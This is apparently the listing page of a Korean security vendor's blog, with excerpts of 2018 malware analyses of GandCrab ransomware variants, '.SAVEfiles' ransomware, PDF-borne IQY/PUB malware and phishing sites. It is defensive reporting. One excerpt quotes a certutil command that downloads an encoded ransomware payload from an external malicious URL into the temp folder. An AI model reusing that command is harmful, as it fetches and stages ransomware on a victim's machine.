전체 글보기1301 주의! 갠드크랩 v5.0 국내 유포중 안랩 ASEC은 GandCrab 제작자가 새로운 버전으로 업데이트를 한 것을 포착하였다. 제작자는 어제(9/24)를 기준으로 v5.0으로 업데이트 하였으며 바탕화면과 랜섬노트 그리고 확장자를 KRAB에서 임의의 5자리 문자열로 변경하였다. [그림-1] GandCrab v5.0 감염 배경화면GandCrab에 감염 시 배경화면의 위의 그림처럼 변경되며, 2번째 줄에는 사용자의 컴퓨터 이름을 사용한다. [그림-2] 변경된 랜섬노트 랜섬노트는 v4기준 텍스트 파일(.txt)에서 HTML파일로 변경되었으며 한글을 사용한다. 또한 랜섬노트 파일명도 KRAB-DECRYPT에서 [변경된 임의의 확장자]-DECRYPT로 변경되었다. [그림-3] 감염된 파일 상기 그림과 같이 파일 감염 시 확장자는 더이상 KRAB을 사용.. 2018. 9. 25. 사용자 몰래 V3 Lite 언인스톨하는 GandCrab v4.3 (*.js) 안랩 ASEC 에서는 국내로 유포되는 갠드크랩 랜섬웨어를 지속적으로 모니터링하고 있다. 그리고 최근 갠드크랩 랜섬웨어 유포 자바스크립트에서 V3 Lite 제품을 언인스톨하는 행위를 포착하였다. 8월 29일에 동일 내용으로 ASEC블로그(http://asec.ahnlab.com/1152)를 통해 V3Lite 언인스톨 기능을 처음으로 소개하였다. 당시 소개된 내용은 사용자에게 V3Lite 언인스톨 화면이 보여지고 클릭을 유도하는 방식이었지만, 현재 유포되는 파일은 언인스톨 화면을 숨기고(Hidden) 버튼 클릭까지 자동으로 이루어지는 방식이다. 즉, 자바스크립트 파일 실행 시 V3Lite 제품이 사용자 모르게 제거되고, 이후 갠드크랩 랜섬웨어가 생성/실행되는 구조로 고도화 되었다. [그림 1] - 난독화된 .. 2018. 9. 20. Nullsoft 설치파일 형태로 유포중인 GandCrab v4.3 안랩 ASEC은 9월 7일 배치파일(*.bat) 형태로 유포되는 Gandcrab에 대해 게시(블로그 링크)하였다. 이 때, 사용된 Gandcrab은 NSIS 외형으로 인젝션하여 동작한다고 간단하게 언급되었다. 이번 글에서는 이 NSIS(Nullsoft Scriptable Install System)외형을 가진 Gandcrab 동작 방식에 대해 설명한다. 먼저, 9월 6일 처음 발견된 NSIS 설치파일 내부에는 정상 이미지 파일들과 악성 *.bin 파일, 정상 System.dll 파일이 존재한다. [그림 1] NSIS 내부 파일들 설치파일 형태의 1차 악성 파일이 실행되면 %temp%경로에 [그림 1]과 같은 파일들을 드롭한다. 그리고, System.dll 이 CALL 호출과 함께 nonagenarians.. 2018. 9. 17. .SAVEfiles 확장자로 암호화 하는 신종 랜섬웨어 발견 안랩 ASEC은 지난 9월 9일 ".SAVEfiles" 확장자로 암호화 하는 랜섬웨어가 유포된 것을 확인 하였다. 인터넷 브라우저를 통해 Drive by Download 로 유입된 것으로 추정되며 실행 시 일부의 경로를 제외하고 .exe, .dll 등 모든 확장자를 암호화 한다.[그림 1. 랜섬웨어 실행 과정] C2로 연결하여 key, Personal id 를 받아오지만 네트워크가 연결되지 않은 환경이라면 내부에 하드코딩된 값을 이용한다.[그림 2. 내부에 하드코딩된 key, Personal id] 이 후 아래의 암호화 제외 경로를 제외한 폴더의 모든 확장자를 암호화 하여 .SAVEfiles 로 확장자를 변경한다. 암호화 제외 경로 C:\Windows\ C:\Program Files (x86)\Mozil.. 2018. 9. 11. PDF 파일에 첨부되어 유포 중인 악성코드 (*.pub, *.iqy) 안랩 ASEC 지난 8월 PDF 파일의 첨부 파일 형태로 IQY와 PUB 확장자 악성코드가 유포 중인 것을 확인하였다. 확인된 PDF 첨부 파일의 확장자에 대해서 간략히 설명하면, *.iqy 확장자는 엑셀에서 사용하는 인터넷 쿼리 파일 형식이고, *.pub확장자는 MS Office의 Publisher와 관련된 프로그램의 확장자이다.다음 [그림 1]과 [그림 2]는 IQY, PUB 악성코드가 첨부된 PDF 악성코드의 동작 과정을 설명한 것이다. 결과적으로 악성 매크로를 실행하는 것을 확인할 수 있다. [그림 1] IQY 확장자를 포함한 PDF 파일의 악성 행위 과정 [그림 2] PUB 확장자를 포함한 PDF 파일의 악성 행위 과정 해당 PDF 실행 시 [그림 3]과 같은 실행 경고 창이 뜨면서 PDF 내부.. 2018. 9. 10. 배치파일(*.bat) 형태로 유포되는 GandCrab v4.3 (certutil.exe) 안랩 ASEC은 9월 6일 배치파일(*.bat) 형태로 유포되는 Gandcrab v4.3을 발견하였다. 이 배치파일은 certutil 이라는 윈도우즈 기본 명령을 이용해 동작한다. 동작하는 과정은 먼저 특정 URL에서 파일을 다운로드 받는다. 다운로드 받은 바이너리는 서명 파일인것처럼 위장한 BASE64형태로 인코딩 되어있다. 그리고 -decode 옵션을 이용해 Base64 디코드 후 cab 파일로 저장한다. cab파일은 압축 파일로 -expand 옵션으로 압축해제 후 실행하면 Gandcrab 랜섬웨어가 실행된다. [그림-1] 동작 방식 certutil -urlcache -split -f http://files.occarlsongracieteams.com/x/gate.php %TMP%\ercg345c24.. 2018. 9. 7. 구글 한국어 웹 검색 시 노출되는 GandCrab 유포 자바스크립트 안랩 ASEC은 자바스크립트를 통한 갠드크랩 랜섬웨어 유포 방식관련하여 8월 29일자 ASEC블로그를 통해 공개하였다. (참고: http://asec.ahnlab.com/1152)9월 4일자 '구글 검색 통해 안랩 V3 제거 유도하는 갠드크랩 랜섬웨어 발견' 제목의 보안뉴스 기사에 소개된 내용은 이러한 자바스크립트 파일이 유포되는 방식 중 하나를 나타낸다.- https://www.boannews.com/media/view.asp?idx=72715구글 브라우저를 통해 한국어 웹으로 특정 단어를 검색 시, 상단에 노출되어 일반 사용자로 하여금 다운로드 및 실행을 유도하고 있다. 아래의 [그림-1]은 "petools"라는 단어를 한국어 웹으로 설정하여 검색 시, 갠드크랩 랜섬웨어 유포와 관련된 사이트가 노출된.. 2018. 9. 6. 특정 타겟을 목표로 유포되는 피싱공격 안랩 ASEC은 최근 매일같이 기업사용자의 계정정보를 탈취하려는 피싱 사이트가 기승을 부리고 있는 것을 포착하였다. 최근에는 사용자를 속이기 위해 매우 정교해지고 있어 확인되지 않은 외부 URL 접근에 대한 각별한 주의가 필요하다. [그림-1] 기존 유포 피싱 사이트기존 피싱 사이트의 경우 상기 [그림-1]의 왼쪽 상단처럼 기업 로고만 도용하여 허술하게 제작되어 계정 입력란만 활성화가 되어있었다. 해당 사이트에서 연결된 페이지는 제작하지 않아 상기 그림의 빨간 박스안에 링크는 모두 비활성화 되어 클릭 되지 않는다. 해당 링크를 클릭시 다른 페이지로 연결되지 않아 사용자가 조금만 주의를 기울이면 정상적으로 서비스 되는 사이트가 아닌 것을 인지할 수 있었다. 하지만 비교적 최근 피싱 사이트는 사용자의 계정을.. 2018. 9. 5. 이전 1 ··· 26 27 28 29 30 31 32 ··· 163 다음
